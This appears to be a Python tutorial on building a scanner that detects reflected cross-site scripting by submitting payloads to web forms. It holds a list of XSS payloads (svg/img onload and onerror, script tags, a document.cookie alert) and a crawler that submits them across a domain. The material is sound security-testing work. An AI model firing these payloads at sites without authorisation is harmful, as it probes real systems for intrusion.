
Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise users' interactions with a vulnerable web application. The attacker aims to execute scripts in the victim's web browser by including malicious code on a normal web page. Flaws that allow these attacks are widespread in web applications that accept user input.

In this tutorial, you will learn how to write a Python script from scratch to detect this vulnerability.






Getting Started

We'll need to install these libraries:

```
$ pip3 install requests bs4 colorama
```

Alright, let's get started:

```python
import requests
from pprint import pprint
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
```

Since this type of web vulnerability is exploited through user inputs and forms, we need to fill out any form we find with some JavaScript code. So, let's first make a function to get all the forms from the HTML content of any web page (grabbed from this tutorial):

```python
def get_all_forms(url):
    """Given a `url`, it returns all forms from the HTML content"""
    soup = bs(requests.get(url).content, "html.parser")
    return soup.find_all("form")
```

This function returns a list of forms as soup objects. We still need a way to extract every form's details and attributes (such as action, method, and the various input attributes). The function below does exactly that:

```python
def get_form_details(form):
    """
    This function extracts all possible useful information about an HTML `form`
    """
    details = {}
    # get the form action (target url); keep its original case,
    # since URL paths can be case-sensitive
    action = form.attrs.get("action", "")
    # get the form method (POST, GET, etc.)
    method = form.attrs.get("method", "get").lower()
    # get all the input details such as type and name
    inputs = []
    for input_tag in form.find_all("input"):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        inputs.append({"type": input_type, "name": input_name})
    # put everything to the resulting dictionary
    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs
    return details
```

After we get the form details, we need another function to submit any given form:

```python
def submit_form(form_details, url, value):
    """
    Submits a form given in `form_details`
    Params:
        form_details (dict): a dictionary that contains form information
        url (str): the original URL that contains that form
        value (str): this will replace the value of all text and search inputs
    Returns the HTTP Response after form submission
    """
    # construct the full URL (if the url provided in action is relative)
    target_url = urljoin(url, form_details["action"])
    # get the inputs
    inputs = form_details["inputs"]
    data = {}
    # `input_field` rather than `input`, to avoid shadowing the built-in
    for input_field in inputs:
        # replace all text and search values with `value`
        if input_field["type"] == "text" or input_field["type"] == "search":
            input_field["value"] = value
        input_name = input_field.get("name")
        input_value = input_field.get("value")
        if input_name and input_value:
            # if input name and value are not None,
            # then add them to the data of form submission
            data[input_name] = input_value
    print(f"[+] Submitting malicious payload to {target_url}")
    print(f"[+] Data: {data}")
    if form_details["method"] == "post":
        return requests.post(target_url, data=data)
    else:
        # GET request
        return requests.get(target_url, params=data)
```

The above function takes form_details, the output of the get_form_details() function we just wrote, which contains all the form details. It also accepts the url of the page that contains the original HTML form, and the value to set for every text or search input field.

After we extract the form information, we just submit the form using requests.get() or requests.post() methods (depending on the form method).
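To make the URL handling concrete, here is a minimal offline sketch of how a form's action is resolved and how a payload ends up in a GET query string. It uses only the standard library; `page_url` is a hypothetical address, and `urlencode()` only approximates the encoding that requests performs when it receives `params=data`.

```python
from urllib.parse import parse_qs, urlencode, urljoin

page_url = "https://example.com/search/index.html"  # hypothetical page containing the form
payload = "<Script>alert('hi')</scripT>"

# An empty or relative action is resolved against the page URL
same_page = urljoin(page_url, "")             # empty action: submit to the same page
sibling = urljoin(page_url, "results")        # relative path
root_relative = urljoin(page_url, "/submit")  # root-relative path
print(same_page)
print(sibling)
print(root_relative)

# For a GET form, the data is percent-encoded into the query string
query_string = urlencode({"query": payload})
print(f"{same_page}?{query_string}")

# The server decodes it back to the original payload
decoded = parse_qs(query_string)["query"][0]
print(decoded == payload)
```

For a POST form the same key/value pairs travel in the request body instead of the URL.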

Now that we have functions to extract all form details from a web page and submit them, scanning for the XSS vulnerability is easy:

```python
def scan_xss(url):
    """
    Given a `url`, it prints all XSS vulnerable forms and
    returns True if any is vulnerable, False otherwise
    """
    # get all the forms from the URL
    forms = get_all_forms(url)
    print(f"[+] Detected {len(forms)} forms on {url}.")
    js_script = "<Script>alert('hi')</scripT>"
    # returning value
    is_vulnerable = False
    # iterate over all forms
    for form in forms:
        form_details = get_form_details(form)
        content = submit_form(form_details, url, js_script).content.decode()
        if js_script in content:
            print(f"[+] XSS Detected on {url}")
            print("[*] Form details:")
            pprint(form_details)
            is_vulnerable = True
            # won't break because we want to print available vulnerable forms
    return is_vulnerable
```

Here is what the function does:

- Given a URL, it grabs all the HTML forms and then prints the number of forms detected.

- It then iterates over the forms and submits each one, setting the value of every text and search input field to a piece of JavaScript code.

- If the JavaScript code comes back unmodified in the response, a browser would execute it, which is a clear sign that the web page is XSS vulnerable.
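The check in the last step is a plain substring test on the response body. As a rough offline sketch of that idea, the two functions below stand in for a server's response (they are hypothetical and replace the real HTTP request): one echoes the input as-is, the other HTML-escapes it first.

```python
import html

PAYLOAD = "<Script>alert('hi')</scripT>"

def echo_raw(query):
    """Hypothetical vulnerable page: echoes the input without escaping."""
    return f"<p>Results for {query}</p>"

def echo_escaped(query):
    """Hypothetical safe page: HTML-escapes the input before echoing it."""
    return f"<p>Results for {html.escape(query)}</p>"

def payload_reflected(render, payload):
    """Same test as in scan_xss(): does the payload come back verbatim?"""
    return payload in render(payload)

raw_result = payload_reflected(echo_raw, PAYLOAD)
escaped_result = payload_reflected(echo_escaped, PAYLOAD)
print(raw_result)      # True: the markup survives, so a browser would run it
print(escaped_result)  # False: < and > were turned into &lt; and &gt;
```

Keep in mind that this kind of check detects reflection only. It is a good indicator, but the scanner never runs the response in a browser.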

Let's try this out:

```python
if __name__ == "__main__":
    url = "https://xss-game.appspot.com/level1/frame"
    print(scan_xss(url))
```

This is an intentionally XSS-vulnerable website. Here is the result:

```
[+] Detected 1 forms on https://xss-game.appspot.com/level1/frame.
[+] XSS Detected on https://xss-game.appspot.com/level1/frame
[*] Form details:
{'action': '',
 'inputs': [{'name': 'query',
             'type': 'text',
             'value': "<Script>alert('hi')</scripT>"},
            {'name': None, 'type': 'submit'}],
 'method': 'get'}
True
```

As you can see, the XSS vulnerability is successfully detected. Now, this code is great, but it can be better. From the current implementation, notice we are using just one payload: <Script>alert('hi')</scripT>.

Extended XSS Scanner

A lot of websites use filters that will catch this payload. Some websites won't even execute a <script> tag regardless of how cunningly you manipulate the capitalization. To solve this, instead of using just one payload, we'll use a list of different payloads. So that if, for any reason, a filter blocks a particular payload, others may be successful.
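To see why a single payload is fragile, consider this small sketch. `naive_script_filter()` is a hypothetical server-side filter (not taken from any real site) that strips `<script>` tags regardless of capitalization; payloads that rely on other tags pass through it untouched.

```python
import re

def naive_script_filter(text):
    """Hypothetical filter: removes opening and closing <script> tags, ignoring case."""
    return re.sub(r"</?script[^>]*>", "", text, flags=re.IGNORECASE)

payloads = [
    "<Script>alert('XSS')</scripT>",
    "<img src=x onerror=alert(1)>",
    '"><svg/onload=alert(1)>',
]

# A payload "survives" if the filter leaves it unchanged
surviving = [p for p in payloads if naive_script_filter(p) == p]
print(surviving)
```

Here the mixed-case `<Script>` payload is neutralized, while the `<img>` and `<svg>` payloads survive, which is the reason for trying several of them.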

We can also improve this scanner by implementing crawling functionality. Most of the time, penetration testers start testing for vulnerabilities manually. When they discover a suspicious endpoint, they pass the link to an automated scanner like the one we're building. This makes the job a lot faster because they are giving a specific endpoint to the scanner.

Other times, they may want to test the payloads on the entire website. We'll add an option to crawl the entire website and test all possible endpoints for XSS vulnerabilities.
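Before wiring crawling into the scanner, it may help to see the idea in isolation. The sketch below crawls a hypothetical in-memory site map (`FAKE_SITE`) instead of fetching real pages, stays on the starting host, and stops at an optional limit. Note that it uses a breadth-first queue for clarity, which is an assumption of this example; the scanner in this tutorial recurses into links instead.

```python
from collections import deque
from urllib.parse import urlparse

# Hypothetical site map: page URL -> links found on that page
FAKE_SITE = {
    "https://example.com/": [
        "https://example.com/a",
        "https://example.com/b",
        "https://other.example.org/",  # external link, should be skipped
    ],
    "https://example.com/a": ["https://example.com/", "https://example.com/c"],
    "https://example.com/b": [],
    "https://example.com/c": [],
}

def crawl(start_url, max_links=0):
    """Breadth-first crawl limited to the start URL's host; max_links=0 means no limit."""
    host = urlparse(start_url).netloc
    visited = []
    seen = {start_url}
    queue = deque([start_url])
    while queue:
        url = queue.popleft()
        visited.append(url)
        if max_links and len(visited) >= max_links:
            break
        for link in FAKE_SITE.get(url, []):
            # only follow unseen links on the same host
            if urlparse(link).netloc == host and link not in seen:
                seen.add(link)
                queue.append(link)
    return visited

all_pages = crawl("https://example.com/")
limited = crawl("https://example.com/", max_links=2)
print(all_pages)
print(limited)
```

The `seen` set plays the same role as a visited-URL set in the scanner: without it, the link from `/a` back to `/` would cause an endless loop.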

Let's get started with another advanced XSS script; name it something like xss_scanner_extended.py:

```python
import requests  # Importing requests library for making HTTP requests
from pprint import pprint  # Importing pprint for pretty-printing data structures
from bs4 import BeautifulSoup as bs  # Importing BeautifulSoup for HTML parsing
from urllib.parse import urljoin, urlparse  # Importing utilities for URL manipulation
from urllib.robotparser import RobotFileParser  # Importing RobotFileParser for parsing robots.txt files
from colorama import Fore, Style  # Importing colorama for colored terminal output
import argparse  # Importing argparse for command-line argument parsing

# List of XSS payloads to test forms with
XSS_PAYLOADS = [
    '"><svg/onload=alert(1)>',
    '\'><svg/onload=alert(1)>',
    '<img src=x onerror=alert(1)>',
    '"><img src=x onerror=alert(1)>',
    '\'><img src=x onerror=alert(1)>',
    "';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//--></script>",
    "<Script>alert('XSS')</scripT>",
    "<script>alert(document.cookie)</script>",
]

# global variable to store all crawled links
crawled_links = set()

def print_crawled_links():
    """
    Print all crawled links
    """
    print("\n[+] Links crawled:")
    for link in crawled_links:
        print(f" {link}")
    print()
```

XSS_PAYLOADS is a list of XSS payloads to try. It includes a variant of our previous payload; feel free to add more.

The crawled_links set global variable tracks the visited links, and print_crawled_links() function prints this set.

Next, let's write our get_all_forms(), get_form_details(), and submit_form() functions:

```python
# Function to get all forms from a given URL
def get_all_forms(url):
    """Given a `url`, it returns all forms from the HTML content"""
    try:
        # Using BeautifulSoup to parse HTML content of the URL
        soup = bs(requests.get(url).content, "html.parser")
        # Finding all form elements in the HTML
        return soup.find_all("form")
    except requests.exceptions.RequestException as e:
        # Handling exceptions if there's an error in retrieving forms
        print(f"[-] Error retrieving forms from {url}: {e}")
        return []

# Function to extract details of a form
def get_form_details(form):
    """This function extracts all possible useful information about an HTML `form`"""
    details = {}
    # Extracting form action and method; the action keeps its original case,
    # since URL paths can be case-sensitive
    action = form.attrs.get("action", "")
    method = form.attrs.get("method", "get").lower()
    inputs = []
    # Extracting input details within the form
    for input_tag in form.find_all("input"):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        inputs.append({"type": input_type, "name": input_name})
    # Storing form details in a dictionary
    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs
    return details

# Function to submit a form with a specific value
def submit_form(form_details, url, value):
    """Submits a form given in `form_details`
    Params:
        form_details (dict): a dictionary that contains form information
        url (str): the original URL that contains that form
        value (str): this will replace the value of all text and search inputs
    Returns the HTTP Response after form submission, or None on a request error"""
    target_url = urljoin(url, form_details["action"])  # Constructing the absolute form action URL
    inputs = form_details["inputs"]
    data = {}
    # Filling form inputs with the provided value
    # (`input_field` rather than `input`, to avoid shadowing the built-in)
    for input_field in inputs:
        if input_field["type"] == "text" or input_field["type"] == "search":
            input_field["value"] = value
        input_name = input_field.get("name")
        input_value = input_field.get("value")
        if input_name and input_value:
            data[input_name] = input_value
    try:
        # Making the HTTP request based on the form method (POST or GET)
        if form_details["method"] == "post":
            return requests.post(target_url, data=data)
        else:
            return requests.get(target_url, params=data)
    except requests.exceptions.RequestException as e:
        # Handling exceptions if there's an error in form submission
        print(f"[-] Error submitting form to {target_url}: {e}")
        return None
```

Next, let's make a utility function to extract all links from a URL:

```python
def get_all_links(url):
    """
    Given a `url`, it returns all links from the HTML content
    """
    try:
        # Using BeautifulSoup to parse HTML content of the URL
        soup = bs(requests.get(url).content, "html.parser")
        # Finding all anchor elements that actually carry an href attribute
        return [urljoin(url, link["href"]) for link in soup.find_all("a", href=True)]
    except requests.exceptions.RequestException as e:
        # Handling exceptions if there's an error in retrieving links
        print(f"[-] Error retrieving links from {url}: {e}")
        return []
```

Now, let's write our scan_xss() function, which supports crawling, obeying robots.txt (if the option is set), and testing multiple payloads:

```python
# Function to scan for XSS vulnerabilities
def scan_xss(args, scanned_urls=None):
    """Given a `url`, it prints all XSS vulnerable forms and
    returns True if any is vulnerable, None if already scanned, False otherwise"""
    global crawled_links
    if scanned_urls is None:
        scanned_urls = set()
    # Checking if the URL is already scanned
    if args.url in scanned_urls:
        return
    # Adding the URL to the scanned URLs set
    scanned_urls.add(args.url)
    # Getting all forms from the given URL
    forms = get_all_forms(args.url)
    print(f"\n[+] Detected {len(forms)} forms on {args.url}")
    # Parsing the URL to get the domain
    parsed_url = urlparse(args.url)
    domain = f"{parsed_url.scheme}://{parsed_url.netloc}"
    if args.obey_robots:
        robot_parser = RobotFileParser()
        robot_parser.set_url(urljoin(domain, "/robots.txt"))
        try:
            robot_parser.read()
        except Exception as e:
            # Handling exceptions if there's an error in reading robots.txt
            print(f"[-] Error reading robots.txt file for {domain}: {e}")
            crawl_allowed = False
        else:
            crawl_allowed = robot_parser.can_fetch("*", args.url)
    else:
        crawl_allowed = True
    is_vulnerable = False
    # Only test the forms when robots.txt allows it (or is not being obeyed)
    if crawl_allowed:
        for form in forms:
            form_details = get_form_details(form)
            form_vulnerable = False
            # Testing each form with XSS payloads
            for payload in XSS_PAYLOADS:
                response = submit_form(form_details, args.url, payload)
                # `is not None`: a Response with a 4xx/5xx status is falsy
                if response is not None and payload in response.content.decode():
                    print(f"\n{Fore.GREEN}[+] XSS Vulnerability Detected on {args.url}{Style.RESET_ALL}")
                    print("[*] Form Details:")
                    pprint(form_details)
                    print(f"{Fore.YELLOW}[*] Payload: {payload} {Style.RESET_ALL}")
                    # save to a file if output file is provided
                    if args.output:
                        with open(args.output, "a") as f:
                            f.write(f"URL: {args.url}\n")
                            f.write(f"Form Details: {form_details}\n")
                            f.write(f"Payload: {payload}\n")
                            f.write("-"*50 + "\n\n")
                    form_vulnerable = True
                    is_vulnerable = True
                    break  # No need to try other payloads for this endpoint
            if not form_vulnerable:
                print(f"{Fore.MAGENTA}[-] No XSS vulnerability found on {args.url}{Style.RESET_ALL}")
    # Crawl links if the option is enabled
    if args.crawl:
        print(f"\n[+] Crawling links from {args.url}")
        # get_all_links() handles request errors itself and returns [] on failure
        links = get_all_links(args.url)
        for link in set(links):  # Removing duplicates
            if link.startswith(domain):
                crawled_links.add(link)
                if args.max_links and len(crawled_links) >= args.max_links:
                    print(f"{Fore.CYAN}[-] Maximum links ({args.max_links}) limit reached. Exiting...{Style.RESET_ALL}")
                    print_crawled_links()
                    raise SystemExit(0)
                # Recursively scanning XSS vulnerabilities for crawled links
                args.url = link
                if scan_xss(args, scanned_urls):
                    is_vulnerable = True
    return is_vulnerable
```

The scan_xss() function accepts args, which is the namespace returned by the argparse parser:

```python
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Extended XSS Vulnerability scanner script.")
    parser.add_argument("url", help="URL to scan for XSS vulnerabilities")
    parser.add_argument("-c", "--crawl", action="store_true", help="Crawl links from the given URL")
    # max visited links
    parser.add_argument("-m", "--max-links", type=int, default=0, help="Maximum number of links to visit. Default 0, which means no limit.")
    parser.add_argument("--obey-robots", action="store_true", help="Obey robots.txt rules")
    parser.add_argument("-o", "--output", help="Output file to save the results")
    args = parser.parse_args()
    scan_xss(args)  # Initiating XSS vulnerability scan
    print_crawled_links()
```

The only required argument is clearly the target url. Here are the available options:

- -c or --crawl: Whether to crawl the links from the given URL. If passed, the script will perform XSS scanning on internal links found on the original URL.

- -m or --max-links: When crawling is set, the script won't stop executing until all URLs of that domain are visited. Therefore, this is a stopping parameter: the script stops when it visits the specified maximum number of links. This option helps control the scope of the crawl, preventing it from becoming too extensive and consuming excessive resources or time. For instance, if --max-links 100 is used, the crawler will halt after processing 100 links, regardless of whether more links are available on the site. This is useful for sampling a website's structure or limiting the load on both the crawling server and the target website.

- --obey-robots: Whether you want to obey the crawling rules set by the site owner in the robots.txt file.

- -o or --output: The output file that will contain the URLs, forms, and payloads for which XSS was detected.
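If you want to check how these options end up on the args object without touching the network, you can hand `parse_args()` an explicit list. The sketch below repeats the same argument definitions inside a hypothetical helper called `build_parser()` (the helper name and the example URL are assumptions made for this illustration).

```python
import argparse

def build_parser():
    """Hypothetical helper that recreates the scanner's argument parser."""
    parser = argparse.ArgumentParser(description="Extended XSS Vulnerability scanner script.")
    parser.add_argument("url", help="URL to scan for XSS vulnerabilities")
    parser.add_argument("-c", "--crawl", action="store_true", help="Crawl links from the given URL")
    parser.add_argument("-m", "--max-links", type=int, default=0, help="Maximum number of links to visit")
    parser.add_argument("--obey-robots", action="store_true", help="Obey robots.txt rules")
    parser.add_argument("-o", "--output", help="Output file to save the results")
    return parser

# Passing a list makes argparse parse it instead of sys.argv
args = build_parser().parse_args(["https://example.com/", "-c", "-m", "3", "--obey-robots"])
print(args.url, args.crawl, args.max_links, args.obey_robots, args.output)
```

Note that argparse turns the dashes in --max-links and --obey-robots into underscores, which is why the scanner reads args.max_links and args.obey_robots.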

Let's run it like previously:

```
$ python xss_scanner_extended.py https://xss-game.appspot.com/level1/frame
[+] Detected 1 forms on https://xss-game.appspot.com/level1/frame
[+] XSS Vulnerability Detected on https://xss-game.appspot.com/level1/frame
[*] Form Details:
{'action': '',
 'inputs': [{'name': 'query',
             'type': 'text',
             'value': '"><svg/onload=alert(1)>'},
            {'name': None, 'type': 'submit'}],
 'method': 'get'}
[*] Payload: "><svg/onload=alert(1)>
```

Our program shows us the particular payload reflected (from the list) - indicating the vulnerability.

Let's now use the new parameters:

```
$ python xss_scanner_extended.py https://thepythoncode.com/article/make-a-xss-vulnerability-scanner-in-python -c -m 3 --obey-robots
```

We're testing the URL of this page. Obviously, XSS won't be found, but you get the idea! This will crawl 3 links from this page and test all the XSS payloads again. It'll also obey the robots.txt rules.
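To get a feel for what obeying robots.txt means, here is a small offline sketch using the same RobotFileParser class. Instead of downloading a file with read(), it feeds made-up rules to parse(); the rules and the example.com URLs are assumptions for illustration only.

```python
from urllib.robotparser import RobotFileParser

# Hypothetical robots.txt content
robots_txt = """\
User-agent: *
Disallow: /admin/
"""

robot_parser = RobotFileParser()
robot_parser.parse(robots_txt.splitlines())

# can_fetch() answers: may this user agent request this URL?
allowed_article = robot_parser.can_fetch("*", "https://example.com/article/some-page")
allowed_admin = robot_parser.can_fetch("*", "https://example.com/admin/login")
print(allowed_article)  # True: no rule matches this path
print(allowed_admin)    # False: the path starts with /admin/
```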

Alright, we are done with this tutorial! You can extend this code by adding more advanced XSS payloads.

Also, if you want more advanced tools to detect and even exploit XSS, there are plenty out there. XSStrike is one such tool, and it is written purely in Python!


Happy Coding ♥
